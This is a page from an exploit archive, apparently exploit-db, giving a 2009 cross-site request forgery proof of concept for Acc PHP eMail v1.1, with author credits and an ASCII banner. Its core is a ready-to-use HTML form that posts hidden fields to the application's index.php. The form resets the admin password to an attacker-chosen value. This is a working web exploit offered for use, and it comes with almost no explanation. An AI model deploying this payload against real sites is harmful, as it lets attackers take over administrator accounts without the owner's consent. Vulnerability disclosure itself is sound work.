[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Acc PHP eMail v1.1 - CSRF
# Published : 2009-12-13
# Author : bi0
# Previous Title : SpireCMS v2.0 SQL Injection Vulnerability
# Next Title : Frog v0.9.5 CSRF Vulnerability


______     __     ______
               /  ==    /    /  __ 
                  __<         / 
                 _____   _   _____
                 /_____/   /_/   /_____/

                 01000010 01101001 01001111

[#]----------------------------------------------------------------[#]
#
# [+] Acc PHP eMail v1.1 - [ CSRF ]
#
#  // Author Info
# [x] Author: bi0
# [x] Contact: bukibv@hotmail.com
# [x] Homepage : www.ssteam.ws
# [x] Thanks: packetdeath,,Zer0flag,redking and ssteam.ws ...
#
[#]-------------------------------------------------------------------------------------------[#]
#
# [x] Exploit :
#
# [ CSRF ]
#
#  It Changes the password
#
#  http://localhost/mailinglist/index.php
#
# // Start CSRF
# <html>
# <form action="http://localhost/mailinglist/demo/index.php" method="POST">
# <input type="hidden" name="action" value="change">
# <input type="hidden" name="id" value="1">
# <input type="hidden" id="text" name="user" value="admin">
# <input type="password"  name="password" value="pass">
# <input type="password"  name="password1" value="pass">
# <input type="hidden" name="action" value="change1">
# <input type="submit" name="login" value="Modify">
# </form>
# </html>
# // End of attack
#
[#]------------------------------------------------------------------------------------------[#]

#EOF